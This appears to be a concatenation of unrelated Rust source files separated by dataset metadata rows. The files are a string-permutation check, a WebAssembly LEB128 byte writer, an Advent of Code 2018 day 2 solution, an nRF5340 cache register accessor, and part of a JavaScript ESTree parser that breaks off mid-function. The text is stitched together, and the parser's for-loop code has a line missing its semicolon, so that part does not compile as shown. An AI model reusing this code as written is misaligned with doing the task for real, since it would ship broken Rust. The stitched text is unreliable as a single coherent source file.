        *counts.entry(c).or_insert(0) += 1;
    }
    for c in input2.chars() {
        *counts.entry(c).or_insert(0) -= 1;
    }
    counts.values().all(|&n| n == 0)
}
/// Counts the occurrences of each character in `s`.
fn count_char(s: &str) -> HashMap<char, i32> {
    let mut map: HashMap<char, i32> = HashMap::new();
    for c in s.chars() {
        // The entry API performs a single lookup per character,
        // replacing the previous `get_mut`-or-`insert` two-step.
        *map.entry(c).or_insert(0) += 1;
    }
    map
}
#[cfg(test)]
mod tests {
    use super::*;
    // Exercises positive cases (including `&String` arguments, which
    // deref-coerce to `&str`) and negative cases of the same length.
    #[test]
    fn test_is_permutation() {
        assert_eq!(
            is_permutation(&String::from("asdf"), &String::from("dsaf")),
            true
        );
        assert_eq!(is_permutation("asdf", "safd"), true);
        assert_eq!(is_permutation("asdf", "zsdf"), false);
        assert_eq!(is_permutation("alex", "alet"), false);
    }
}
| true |
b03cb0d29aff7258f8a8875eedae9c7181fcbcbd
|
Rust
|
KeenS/WebAssembler-rs
|
/src/util.rs
|
UTF-8
| 1,992 | 3.109375 | 3 |
[] |
no_license
|
/// Appends the single byte `u` to `buf`; returns the byte count (always 1).
#[inline]
pub fn write_uint8(buf: &mut Vec<u8>, u: u8) -> usize {
    buf.extend_from_slice(&[u]);
    1
}
/// Writes `u` to `buf` in little-endian byte order; returns the byte count (2).
#[inline]
pub fn write_uint16(buf: &mut Vec<u8>, u: u16) -> usize {
    // `to_le_bytes` replaces the manual shift-and-mask byte extraction.
    buf.extend_from_slice(&u.to_le_bytes());
    2
}
/// Writes `u` to `buf` in little-endian byte order; returns the byte count (4).
#[inline]
pub fn write_uint32(buf: &mut Vec<u8>, u: u32) -> usize {
    // `to_le_bytes` replaces the manual split into two u16 halves.
    buf.extend_from_slice(&u.to_le_bytes());
    4
}
/// Writes `u` to `buf` in little-endian byte order; returns the byte count (8).
#[inline]
pub fn write_uint64(buf: &mut Vec<u8>, u: u64) -> usize {
    // `to_le_bytes` replaces the manual split into two u32 halves.
    buf.extend_from_slice(&u.to_le_bytes());
    8
}
/// Writes a 1-bit varuint: always a single raw byte; returns 1.
#[inline]
pub fn write_varuint1(buf: &mut Vec<u8>, u: u8) -> usize {
    buf.push(u);
    1
}
/// Writes a 7-bit varuint: always a single raw byte; returns 1.
#[allow(dead_code)]
#[inline]
pub fn write_varuint7(buf: &mut Vec<u8>, u: u8) -> usize {
    buf.push(u);
    1
}
/// Writes a 7-bit signed LEB128 value (range -64..=63) as a single byte.
///
/// The encoding is the value's low 7 bits with the continuation bit (0x80)
/// clear. The previous `^ 0x80` wrongly set the continuation bit for
/// non-negative inputs (e.g. `1` encoded as `0x81`); masking with `0x7f`
/// is correct for the whole -64..=63 range.
#[inline]
pub fn write_varint7(buf: &mut Vec<u8>, i: i8) -> usize {
    buf.push((i as u8) & 0x7f);
    1
}
/// Generates a LEB128 writer `fn $name(buf, value) -> usize` (bytes written).
///
/// The previous single implementation terminated only when the remaining
/// value equaled the sign-extension word, omitting the signed-LEB128
/// sign-bit check on the final byte. That made `write_varint32(64)` emit
/// `0x40` (which decodes as -64) and `write_varint32(-65)` emit `0x3F`
/// (which decodes as +63). The macro now has separate unsigned and signed
/// arms using the standard LEB128 termination conditions.
macro_rules! gen_write_var {
    // Unsigned LEB128: emit 7-bit groups, low bits first, until the
    // remaining value is zero.
    ($name: ident, $ty: ty, unsigned) => {
        #[inline]
        pub fn $name(buf: &mut Vec<u8>, mut u: $ty) -> usize {
            let mut size = 0;
            loop {
                let byte = (u & 0x7f) as u8;
                u >>= 7;
                size += 1;
                if u == 0 {
                    buf.push(byte);
                    return size;
                }
                buf.push(byte | 0x80);
            }
        }
    };
    // Signed LEB128: done when the remaining value is all sign bits AND
    // the sign bit (0x40) of the last emitted group agrees with the sign.
    ($name: ident, $ty: ty, signed) => {
        #[inline]
        pub fn $name(buf: &mut Vec<u8>, mut u: $ty) -> usize {
            let mut size = 0;
            loop {
                let byte = (u & 0x7f) as u8;
                // Arithmetic shift on signed types preserves the sign.
                u >>= 7;
                size += 1;
                let done = (u == 0 && (byte & 0x40) == 0) || (u == -1 && (byte & 0x40) != 0);
                if done {
                    buf.push(byte);
                    return size;
                }
                buf.push(byte | 0x80);
            }
        }
    };
}
gen_write_var!(write_varuint32, u32, unsigned);
gen_write_var!(write_varint32, i32, signed);
gen_write_var!(write_varint64, i64, signed);
/// Appends all of `u` to `buf`; returns how many bytes were appended.
#[inline]
pub fn write_slice(buf: &mut Vec<u8>, u: &[u8]) -> usize {
    let written = u.len();
    buf.extend_from_slice(u);
    written
}
| true |
017b97b3fc23083cf32f4470f62d90f4569c4abf
|
Rust
|
alecdwm/advent-of-code
|
/src/year_2018/day2.rs
|
UTF-8
| 5,602 | 3.859375 | 4 |
[] |
no_license
|
//! --- Day 2: Inventory Management System ---
//!
//! You stop falling through time, catch your breath, and check the screen on the device. "Destination reached. Current Year: 1518. Current Location: North Pole Utility Closet 83N10." You made it! Now, to find those anomalies.
//!
//! Outside the utility closet, you hear footsteps and a voice. "...I'm not sure either. But now that so many people have chimneys, maybe he could sneak in that way?" Another voice responds, "Actually, we've been working on a new kind of suit that would let him fit through tight spaces like that. But, I heard that a few days ago, they lost the prototype fabric, the design plans, everything! Nobody on the team can even seem to remember important details of the project!"
//!
//! "Wouldn't they have had enough fabric to fill several boxes in the warehouse? They'd be stored together, so the box IDs should be similar. Too bad it would take forever to search the warehouse for two similar box IDs..." They walk too far away to hear any more.
use std::collections::BTreeMap;
/// Late at night, you sneak to the warehouse - who knows what kinds of paradoxes you could cause if you were discovered - and use your fancy wrist device to quickly scan every box and produce a list of the likely candidates (your puzzle input).
///
/// To make sure you didn't miss any, you scan the likely candidate boxes again, counting the number that have an ID containing exactly two of any letter and then separately counting those with exactly three of any letter. You can multiply those two counts together to get a rudimentary checksum and compare it to what your device predicts.
///
/// For example, if you see the following box IDs:
///
/// abcdef contains no letters that appear exactly two or three times.
/// bababc contains two a and three b, so it counts for both.
/// abbcde contains two b, but no letter appears exactly three times.
/// abcccd contains three c, but no letter appears exactly two times.
/// aabcdd contains two a and two d, but it only counts once.
/// abcdee contains two e.
/// ababab contains three a and three b, but it only counts once.
///
/// Of these box IDs, four of them contain a letter which appears exactly twice, and three of them contain a letter which appears exactly three times. Multiplying these together produces a checksum of 4 * 3 = 12.
///
/// What is the checksum for your list of box IDs?
pub fn part1() {
    let input = crate::common::read_stdin_to_string();

    let mut two_letter_checksum_component: i64 = 0;
    let mut three_letter_checksum_component: i64 = 0;

    // Per-box letter histogram, reused across IDs and cleared each time.
    let mut seen_letter_counts: BTreeMap<char, i64> = BTreeMap::new();
    for box_id in input.lines() {
        for letter in box_id.chars() {
            // Entry API: one lookup instead of a `get` followed by `insert`.
            *seen_letter_counts.entry(letter).or_insert(0) += 1;
        }

        // Each box contributes at most once to each checksum component.
        if seen_letter_counts.values().any(|&count| count == 2) {
            two_letter_checksum_component += 1;
        }
        if seen_letter_counts.values().any(|&count| count == 3) {
            three_letter_checksum_component += 1;
        }

        seen_letter_counts.clear();
    }

    let checksum = two_letter_checksum_component * three_letter_checksum_component;
    println!("the checksum for your list of box IDs: {}", checksum);
}
/// Confident that your list of box IDs is complete, you're ready to find the boxes full of prototype fabric.
///
/// The boxes will have IDs which differ by exactly one character at the same position in both strings. For example, given the following box IDs:
///
/// abcde
/// fghij
/// klmno
/// pqrst
/// fguij
/// axcye
/// wvxyz
///
/// The IDs abcde and axcye are close, but they differ by two characters (the second and fourth). However, the IDs fghij and fguij differ by exactly one character, the third (h and u). Those must be the correct boxes.
///
/// What letters are common between the two correct box IDs? (In the example above, this is found by removing the differing character from either ID, producing fgij.)
pub fn part2() {
    let input = crate::common::read_stdin_to_string();

    let (first_id, second_id) = find_part2_matches(&input).expect("No matches found");

    // Keep only the positions where both IDs carry the same letter.
    let common_letters: String = first_id
        .chars()
        .zip(second_id.chars())
        .filter_map(|(a, b)| if a == b { Some(a) } else { None })
        .collect();

    println!(
        "the common letters between the two correct box IDs: {}",
        common_letters
    );
}
/// Scans all ordered pairs of box IDs and returns the first pair whose IDs
/// differ in exactly one position (comparing up to the shorter length), or
/// `None` if no such pair exists.
fn find_part2_matches(input: &str) -> Option<(String, String)> {
    for candidate in input.lines() {
        for other in input.lines() {
            if candidate == other {
                continue;
            }
            let differences = candidate
                .chars()
                .zip(other.chars())
                .filter(|(a, b)| a != b)
                .count();
            if differences == 1 {
                return Some((candidate.to_string(), other.to_string()));
            }
        }
    }
    None
}
| true |
1f8c9cabdc88d7113c1277f9a603aa131c18c019
|
Rust
|
nrf-rs/nrf-pacs
|
/pacs/nrf5340-app-pac/src/cache_s/writelock.rs
|
UTF-8
| 4,102 | 2.578125 | 3 |
[
"0BSD"
] |
permissive
|
#[doc = "Register `WRITELOCK` reader"]
pub struct R(crate::R<WRITELOCK_SPEC>);
// svd2rust-generated glue: `Deref`/`From` let the register-specific reader
// be used interchangeably with the generic `crate::R` it wraps.
impl core::ops::Deref for R {
    type Target = crate::R<WRITELOCK_SPEC>;
    #[inline(always)]
    fn deref(&self) -> &Self::Target {
        &self.0
    }
}
impl From<crate::R<WRITELOCK_SPEC>> for R {
    #[inline(always)]
    fn from(reader: crate::R<WRITELOCK_SPEC>) -> Self {
        R(reader)
    }
}
#[doc = "Register `WRITELOCK` writer"]
pub struct W(crate::W<WRITELOCK_SPEC>);
// Same glue for the writer; `DerefMut` additionally lets field writers
// mutate the wrapped raw value.
impl core::ops::Deref for W {
    type Target = crate::W<WRITELOCK_SPEC>;
    #[inline(always)]
    fn deref(&self) -> &Self::Target {
        &self.0
    }
}
impl core::ops::DerefMut for W {
    #[inline(always)]
    fn deref_mut(&mut self) -> &mut Self::Target {
        &mut self.0
    }
}
impl From<crate::W<WRITELOCK_SPEC>> for W {
    #[inline(always)]
    fn from(writer: crate::W<WRITELOCK_SPEC>) -> Self {
        W(writer)
    }
}
#[doc = "Field `WRITELOCK` reader - Lock cache updates"]
pub type WRITELOCK_R = crate::BitReader<WRITELOCK_A>;
#[doc = "Lock cache updates\n\nValue on reset: 0"]
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum WRITELOCK_A {
    #[doc = "0: Cache updates unlocked"]
    UNLOCKED = 0,
    #[doc = "1: Cache updates locked"]
    LOCKED = 1,
}
// The field is a single bit, so the enum maps directly onto bool.
impl From<WRITELOCK_A> for bool {
    #[inline(always)]
    fn from(variant: WRITELOCK_A) -> Self {
        variant as u8 != 0
    }
}
impl WRITELOCK_R {
    #[doc = "Get enumerated values variant"]
    #[inline(always)]
    pub fn variant(&self) -> WRITELOCK_A {
        match self.bits {
            false => WRITELOCK_A::UNLOCKED,
            true => WRITELOCK_A::LOCKED,
        }
    }
    #[doc = "Checks if the value of the field is `UNLOCKED`"]
    #[inline(always)]
    pub fn is_unlocked(&self) -> bool {
        *self == WRITELOCK_A::UNLOCKED
    }
    #[doc = "Checks if the value of the field is `LOCKED`"]
    #[inline(always)]
    pub fn is_locked(&self) -> bool {
        *self == WRITELOCK_A::LOCKED
    }
}
#[doc = "Field `WRITELOCK` writer - Lock cache updates"]
pub type WRITELOCK_W<'a, const O: u8> = crate::BitWriter<'a, u32, WRITELOCK_SPEC, WRITELOCK_A, O>;
// Convenience setters that write a specific enumerated value to the field.
impl<'a, const O: u8> WRITELOCK_W<'a, O> {
    #[doc = "Cache updates unlocked"]
    #[inline(always)]
    pub fn unlocked(self) -> &'a mut W {
        self.variant(WRITELOCK_A::UNLOCKED)
    }
    #[doc = "Cache updates locked"]
    #[inline(always)]
    pub fn locked(self) -> &'a mut W {
        self.variant(WRITELOCK_A::LOCKED)
    }
}
impl R {
    #[doc = "Bit 0 - Lock cache updates"]
    #[inline(always)]
    pub fn writelock(&self) -> WRITELOCK_R {
        WRITELOCK_R::new((self.bits & 1) != 0)
    }
}
impl W {
    #[doc = "Bit 0 - Lock cache updates"]
    #[inline(always)]
    pub fn writelock(&mut self) -> WRITELOCK_W<0> {
        WRITELOCK_W::new(self)
    }
    #[doc = "Writes raw bits to the register."]
    // Unsafe escape hatch: bypasses the typed field API, so the caller is
    // responsible for supplying a valid bit pattern for this register.
    #[inline(always)]
    pub unsafe fn bits(&mut self, bits: u32) -> &mut Self {
        self.0.bits(bits);
        self
    }
}
#[doc = "Lock cache updates. Prevents updating of cache content on cache misses, but will continue to lookup instruction/data fetches in content already present in the cache. Ignored in RAM mode.\n\nThis register you can [`read`](crate::generic::Reg::read), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [writelock](index.html) module"]
pub struct WRITELOCK_SPEC;
// Marker-trait impls wiring this register into the generic register API:
// 32-bit storage, readable, writable, and resetting to 0.
impl crate::RegisterSpec for WRITELOCK_SPEC {
    type Ux = u32;
}
#[doc = "`read()` method returns [writelock::R](R) reader structure"]
impl crate::Readable for WRITELOCK_SPEC {
    type Reader = R;
}
#[doc = "`write(|w| ..)` method takes [writelock::W](W) writer structure"]
impl crate::Writable for WRITELOCK_SPEC {
    type Writer = W;
}
#[doc = "`reset()` method sets WRITELOCK to value 0"]
impl crate::Resettable for WRITELOCK_SPEC {
    #[inline(always)]
    fn reset_value() -> Self::Ux {
        0
    }
}
| true |
c6e7ab01a75b56fdd8294771e02ae57958cb606e
|
Rust
|
EarlGray/language-incubator
|
/js/slothjs/src/parse/mod.rs
|
UTF-8
| 30,647 | 2.953125 | 3 |
[
"BSD-3-Clause"
] |
permissive
|
pub mod estree;
mod heapnode;
mod jsonnode;
#[cfg(test)]
mod test;
use crate::prelude::*;
use crate::ast::*; // yes, EVERYTHING.
use crate::error::ParseError;
use crate::source;
use crate::JSON;
pub use self::heapnode::HeapNode;
type ParseResult<T> = Result<T, ParseError>;
/// `ParserContext` collects lexical scope information to be used later.
///
/// Parsing records every `var`/`let` declaration, every hoisted function
/// declaration, and every identifier usage here; `enter_block_scope`
/// snapshots and restores parts of this state for each block.
#[derive(Debug)]
pub struct ParserContext {
    pub declared_bindings: HashSet<Identifier>, // let|const ...
    pub declared_functions: Vec<FunctionDeclaration>, // function ...
    pub declared_variables: HashSet<Identifier>, // var ...
    pub used_identifiers: HashSet<Identifier>, // note: they are not free before they leave the scope
}
impl ParserContext {
    /// Creates an empty context with no recorded declarations or usages.
    pub fn new() -> ParserContext {
        ParserContext {
            used_identifiers: HashSet::new(),
            declared_bindings: HashSet::new(),
            declared_variables: HashSet::new(),
            declared_functions: Vec::new(),
        }
    }
    /// Records a `var`/`let` declaration of `name`.
    ///
    /// Any redeclaration over an existing `let` binding is an error;
    /// `var` over `var` (and, as written, `let` over `var`) is accepted.
    fn remember_declaration(
        &mut self,
        kind: DeclarationKind,
        name: &Identifier,
    ) -> Result<(), ParseError> {
        let in_bindings = self.declared_bindings.contains(name);
        let in_variables = self.declared_variables.contains(name);
        match (kind, in_bindings, in_variables) {
            (DeclarationKind::Var, false, _) => self.declared_variables.insert(name.clone()),
            (DeclarationKind::Let, false, _) => self.declared_bindings.insert(name.clone()),
            _ => return Err(ParseError::BindingRedeclared {}),
        };
        Ok(())
    }
    /// Runs `action` in a fresh block scope and returns its result together
    /// with the `let` bindings declared inside that block.
    ///
    /// Function-scoped state (`declared_variables`, `declared_functions`) is
    /// swapped into the inner context so the block shares it with the outer
    /// scope; block-scoped state (`declared_bindings`, `used_identifiers`)
    /// starts empty and is filtered on the way out.
    fn enter_block_scope<T, F>(&mut self, mut action: F) -> ParseResult<(T, HashSet<Identifier>)>
    where
        F: FnMut(&mut ParserContext) -> ParseResult<T>,
    {
        // inner_ctx accumulates used identifiers and declared bindings.
        let mut inner_ctx = ParserContext::new();
        // Lend the function-scoped sets to the inner context...
        core::mem::swap(
            &mut self.declared_variables,
            &mut inner_ctx.declared_variables,
        );
        core::mem::swap(
            &mut self.declared_functions,
            &mut inner_ctx.declared_functions,
        );
        let result = action(&mut inner_ctx);
        // ...and take them back afterwards (even if `action` failed).
        core::mem::swap(
            &mut self.declared_variables,
            &mut inner_ctx.declared_variables,
        );
        core::mem::swap(
            &mut self.declared_functions,
            &mut inner_ctx.declared_functions,
        );
        let ParserContext {
            declared_bindings: bindings,
            used_identifiers: mut used_variables,
            ..
        } = inner_ctx;
        // Identifiers bound inside the block are not free outside it.
        for binding in bindings.iter() {
            used_variables.remove(binding);
        }
        // add all remaining usages to the outer used_variables
        self.used_identifiers.extend(used_variables);
        // put declared bindings into BlockStatement; discard them from ParserContext
        let result = result?;
        Ok((result, bindings))
    }
}
/// `ParseFrom` is a unifying interface for constructing all `ast::*` types.
///
/// It's not strictly necessary, `impl ast::X { fn parse_from(...) -> ParseResult<X> {...} }`
/// would do just fine. On the other hand, it feels like a good idea to have all of these
/// to conform to one interface.
trait ParseFrom: Sized {
    /// Builds `Self` from the AST node `source`, recording scope
    /// information (declarations, identifier usages) in `ctx`.
    fn parse_from<S>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self>
    where
        S: SourceNode;
}
/// `SourceNode` is how `ParseFrom::parse_from` sees AST nodes.
pub trait SourceNode: Sized {
    /// Location of the node where an error happened.
    fn to_error(&self) -> JSON;
    /// Try to get source mapping for `self`.
    fn get_location(&self) -> Option<source::Location>;
    /// Use the node as a literal.
    fn get_literal(&self, property: &str) -> ParseResult<Literal>;
    /// Get the boolean value of a child node with name `property`.
    /// It's a ParseError if it does not exist or does not have a boolean meaning.
    fn get_bool(&self, property: &str) -> ParseResult<bool>;
    /// Get the string value of a child node with name `property`.
    /// It's a ParseError if it does not exist or does not have a string meaning.
    fn get_str(&self, property: &str) -> ParseResult<JSString>;
    /// Check that the value of `property` is a string equal to `value`.
    /// Depends on [`SourceNode::get_str`].
    fn expect_str(&self, property: &str, value: &'static str) -> ParseResult<()> {
        let got = self.get_str(property)?;
        match got.as_str() == value {
            true => Ok(()),
            false => Err(ParseError::UnexpectedValue {
                want: value,
                value: self.to_error(),
            }),
        }
    }
    /// Get the child node named `property` and transform it through
    /// `action`, propagating its Result out. A missing child surfaces as
    /// `ParseError::ObjectWithout` (which `map_opt_node` turns into `None`).
    fn map_node<T, F>(&self, property: &str, action: F) -> ParseResult<T>
    where
        F: FnMut(&Self) -> ParseResult<T>;
    /// Like [`SourceNode::map_node`], but a missing child becomes `Ok(None)`
    /// instead of an error; other errors still propagate.
    fn map_opt_node<T, F>(&self, property: &str, action: F) -> ParseResult<Option<T>>
    where
        F: FnMut(&Self) -> ParseResult<T>,
    {
        match self.map_node(property, action) {
            Ok(stmt) => Ok(Some(stmt)),
            Err(ParseError::ObjectWithout { .. }) => Ok(None),
            Err(e) => Err(e),
        }
    }
    /// Map the array of children of a child node with name `property`.
    /// It's a ParseError if it does not exist or does not have an array meaning.
    fn map_array<T, F>(&self, property: &str, func: F) -> ParseResult<Vec<T>>
    where
        F: FnMut(&Self) -> ParseResult<T>;
}
impl Program {
    /// Makes a [`Program`] from anything that implements [`SourceNode`]
    ///
    /// e.g. from a [`JSON`] ESTree.
    pub fn parse_from<S: SourceNode>(source: &S) -> ParseResult<Program> {
        source.expect_str("type", "Program")?;
        let mut ctx = ParserContext::new();
        // The top level is parsed as one big block...
        let body = BlockStatement::parse_from(source, &mut ctx)?;
        // ...and the function-scoped declarations collected along the way
        // become the program's `variables` and `functions`.
        let ParserContext {
            declared_variables: variables,
            declared_functions: functions,
            ..
        } = ctx;
        Ok(Program {
            body,
            variables,
            functions,
        })
    }
}
impl ParseFrom for Statement {
    /// Dispatches on the ESTree `"type"` attribute to the matching
    /// statement parser, attaching the source location if available.
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        let loc = source.get_location().map(Box::new);
        let typ = source.get_str("type")?;
        let stmt = match typ.as_str() {
            "BlockStatement" => Stmt::Block(BlockStatement::parse_from(source, ctx)?),
            "BreakStatement" => Stmt::Break(BreakStatement::parse_from(source, ctx)?),
            "ContinueStatement" => Stmt::Continue(ContinueStatement::parse_from(source, ctx)?),
            "DoWhileStatement" => {
                // Model `do..while` as a for-loop whose init statement is a
                // copy of the body, so the body runs once before the first
                // test of the loop condition.
                let mut stmt = ForStatement::parse_from(source, ctx)?;
                stmt.init = stmt.body.clone();
                Stmt::For(Box::new(stmt))
            }
            "EmptyStatement" => Stmt::Empty,
            "ExpressionStatement" => Stmt::Expr(ExpressionStatement::parse_from(source, ctx)?),
            "ForStatement" | "WhileStatement" => {
                let stmt = ForStatement::parse_from(source, ctx)?;
                Stmt::For(Box::new(stmt))
            }
            "ForInStatement" => {
                let stmt = ForInStatement::parse_from(source, ctx)?;
                Stmt::ForIn(Box::new(stmt))
            }
            "FunctionDeclaration" => Stmt::Function(FunctionDeclaration::parse_from(source, ctx)?),
            "IfStatement" => {
                let stmt = IfStatement::parse_from(source, ctx)?;
                Stmt::If(Box::new(stmt))
            }
            "LabeledStatement" => {
                let stmt = LabelStatement::parse_from(source, ctx)?;
                Stmt::Label(Box::new(stmt))
            }
            "ReturnStatement" => Stmt::Return(ReturnStatement::parse_from(source, ctx)?),
            "SwitchStatement" => Stmt::Switch(SwitchStatement::parse_from(source, ctx)?),
            "ThrowStatement" => Stmt::Throw(ThrowStatement::parse_from(source, ctx)?),
            "TryStatement" => Stmt::Try(TryStatement::parse_from(source, ctx)?),
            "VariableDeclaration" => Stmt::Variable(VariableDeclaration::parse_from(source, ctx)?),
            _ => {
                return Err(ParseError::UnknownNodeType {
                    value: source.to_error(),
                })
            }
        };
        Ok(Statement { stmt, loc })
    }
}
impl ParseFrom for BlockStatement {
    /// Parses the `"body"` array of statements inside a fresh block scope;
    /// `let` bindings declared within become the block's `bindings` set.
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        let (body, bindings) = ctx.enter_block_scope(|ctx| {
            source.map_array("body", |jstmt| Statement::parse_from(jstmt, ctx))
        })?;
        Ok(BlockStatement { body, bindings })
    }
}
impl ParseFrom for IfStatement {
    /// Parses an ESTree `IfStatement` with a mandatory `test` and
    /// `consequent`, and an optional `alternate` (`else` branch).
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        source.expect_str("type", "IfStatement")?;
        let test = source.map_node("test", |jtest| Expression::parse_from(jtest, ctx))?;
        let consequent =
            source.map_node("consequent", |jthen| Statement::parse_from(jthen, ctx))?;
        // `map_opt_node` turns a missing `alternate` into `None`; this
        // replaces a hand-rolled match that duplicated its exact behavior,
        // matching the style of the other optional-child parsers.
        let alternate =
            source.map_opt_node("alternate", |jelse| Statement::parse_from(jelse, ctx))?;
        Ok(IfStatement {
            test,
            consequent,
            alternate,
        })
    }
}
impl ParseFrom for SwitchStatement {
    /// Parses an ESTree `SwitchStatement`: the `discriminant` expression
    /// plus a list of cases; a case with no `test` is the `default:` case.
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        source.expect_str("type", "SwitchStatement")?;
        let discriminant = source.map_node("discriminant", |jdiscriminant| {
            Expression::parse_from(jdiscriminant, ctx)
        })?;
        let cases = source.map_array("cases", |jcase| {
            // `test` is optional: `None` marks the `default` clause.
            let test = jcase.map_opt_node("test", |jtest| Expression::parse_from(jtest, ctx))?;
            let consequent =
                jcase.map_array("consequent", |jstmt| Statement::parse_from(jstmt, ctx))?;
            Ok(SwitchCase { test, consequent })
        })?;
        Ok(SwitchStatement {
            discriminant,
            cases,
        })
    }
}
impl ParseFrom for ForStatement {
    /// Parses `ForStatement`, `WhileStatement` or `DoWhileStatement` nodes
    /// into the unified `ForStatement` AST (while-loops simply have no
    /// `init`/`update`).
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        // Accept any of the three loop node types.
        let for_ok = source.expect_str("type", "ForStatement")
        let while_ok = source.expect_str("type", "WhileStatement");
        let dowhile_ok = source.expect_str("type", "DoWhileStatement");
        for_ok.or(while_ok).or(dowhile_ok)?;
        // `init` may be a variable declaration, an expression, or absent
        // (absent becomes `Stmt::Empty`).
        let init = source
            .map_opt_node("init", |jinit| {
                if let Ok(var) = VariableDeclaration::parse_from(jinit, ctx) {
                    let stmt = Stmt::Variable(var);
                    Ok(Statement { stmt, loc: None })
                } else if let Ok(expr) = Expression::parse_from(jinit, ctx) {
                    let stmt = Stmt::Expr(ExpressionStatement { expression: expr });
                    Ok(Statement { stmt, loc: None })
                } else {
                    Err(ParseError::UnexpectedValue {
                        want: "variable or expression",
                        value: jinit.to_error(),
                    })
                }
            })?
            .unwrap_or(Statement {
                stmt: Stmt::Empty,
                loc: None,
            });
        let test = source.map_opt_node("test", |jtest| Expression::parse_from(jtest, ctx))?;
        let update =
            source.map_opt_node("update", |jupdate| Expression::parse_from(jupdate, ctx))?;
        let body = source.map_node("body", |jbody| Statement::parse_from(jbody, ctx))?;
        Ok(ForStatement {
            init,
            test,
            update,
            body,
        })
    }
}
impl ParseFrom for ForInStatement {
    /// Parses an ESTree `ForInStatement`; the left-hand side is either a
    /// single-variable declaration or an assignable expression.
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        source.expect_str("type", "ForInStatement")?;
        let left = source.map_node("left", |jleft| {
            if let Ok(vardecl) = VariableDeclaration::parse_from(jleft, ctx) {
                // `for (var a, b in x)` is not valid: exactly one declarator.
                if vardecl.declarations.len() != 1 {
                    return Err(ParseError::ForInMultipleVar());
                }
                Ok(ForInTarget::Var(vardecl))
            } else if let Ok(expr) = Expression::parse_from(jleft, ctx) {
                Ok(ForInTarget::Expr(expr))
            } else {
                Err(ParseError::UnexpectedValue {
                    want: "VariableDeclaration | Pattern",
                    value: jleft.to_error(),
                })
            }
        })?;
        let right = source.map_node("right", |jright| Expression::parse_from(jright, ctx))?;
        let body = source.map_node("body", |jbody| Statement::parse_from(jbody, ctx))?;
        Ok(ForInStatement { left, right, body })
    }
}
impl ParseFrom for BreakStatement {
    /// Parses an ESTree `BreakStatement`; the loop label is optional.
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        source.expect_str("type", "BreakStatement")?;
        let maybe_label =
            source.map_opt_node("label", |node| Identifier::parse_from(node, ctx))?;
        Ok(BreakStatement(maybe_label))
    }
}
impl ParseFrom for ContinueStatement {
    /// Parses an ESTree `ContinueStatement`; the loop label is optional.
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        source.expect_str("type", "ContinueStatement")?;
        let maybe_label =
            source.map_opt_node("label", |node| Identifier::parse_from(node, ctx))?;
        Ok(ContinueStatement(maybe_label))
    }
}
impl ParseFrom for LabelStatement {
    /// Parses an ESTree `LabeledStatement`: a mandatory label plus the
    /// statement it applies to.
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        source.expect_str("type", "LabeledStatement")?;
        let label = source.map_node("label", |node| Identifier::parse_from(node, ctx))?;
        let labeled_body = source.map_node("body", |node| Statement::parse_from(node, ctx))?;
        Ok(LabelStatement(label, labeled_body))
    }
}
impl ParseFrom for ReturnStatement {
    /// Parses an ESTree `ReturnStatement`; a bare `return` has no argument.
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        source.expect_str("type", "ReturnStatement")?;
        let returned =
            source.map_opt_node("argument", |node| Expression::parse_from(node, ctx))?;
        Ok(ReturnStatement(returned))
    }
}
impl ParseFrom for ThrowStatement {
    /// Parses an ESTree `ThrowStatement`; the thrown value is mandatory.
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        source.expect_str("type", "ThrowStatement")?;
        let thrown = source.map_node("argument", |node| Expression::parse_from(node, ctx))?;
        Ok(ThrowStatement(thrown))
    }
}
impl ParseFrom for TryStatement {
    /// Parses an ESTree `TryStatement`: a mandatory `try` block with an
    /// optional `catch` handler and an optional `finally` block.
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        source.expect_str("type", "TryStatement")?;
        let block = source.map_node("block", |jblock| BlockStatement::parse_from(jblock, ctx))?;
        let handler = source.map_opt_node("handler", |jhandler| {
            // The catch parameter is the identifier bound to the exception.
            let param = jhandler.map_node("param", |jparam| Identifier::parse_from(jparam, ctx))?;
            let body = jhandler.map_node("body", |jbody| BlockStatement::parse_from(jbody, ctx))?;
            Ok(CatchClause { param, body })
        })?;
        let finalizer = source.map_opt_node("finalizer", |jobject| {
            BlockStatement::parse_from(jobject, ctx)
        })?;
        Ok(TryStatement {
            block,
            handler,
            finalizer,
        })
    }
}
impl ParseFrom for VariableDeclaration {
    /// Parses an ESTree `VariableDeclaration` (`var`/`let`), registering
    /// every declared name with the parser context. `const` is not yet
    /// implemented and panics via `todo!`.
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        source.expect_str("type", "VariableDeclaration")?;
        let kind = match source.get_str("kind")?.as_str() {
            "const" => todo!("DeclarationKind::Const"),
            "let" => DeclarationKind::Let,
            "var" => DeclarationKind::Var,
            _ => {
                // `return Err(...)` suffices: the previous `return Err(...)?;`
                // made the `return` itself dead code, since `?` on an `Err`
                // already propagates out of the function.
                return Err(ParseError::UnexpectedValue {
                    want: "var | let | const",
                    value: source.map_node("kind", |node| Ok(node.to_error()))?,
                });
            }
        };
        let declarations = source.map_array("declarations", |decl| {
            decl.expect_str("type", "VariableDeclarator")?;
            let name = decl.map_node("id", |jid| Identifier::parse_from(jid, ctx))?;
            // The initializer is optional (`var x;`).
            let init = decl.map_opt_node("init", |jinit| {
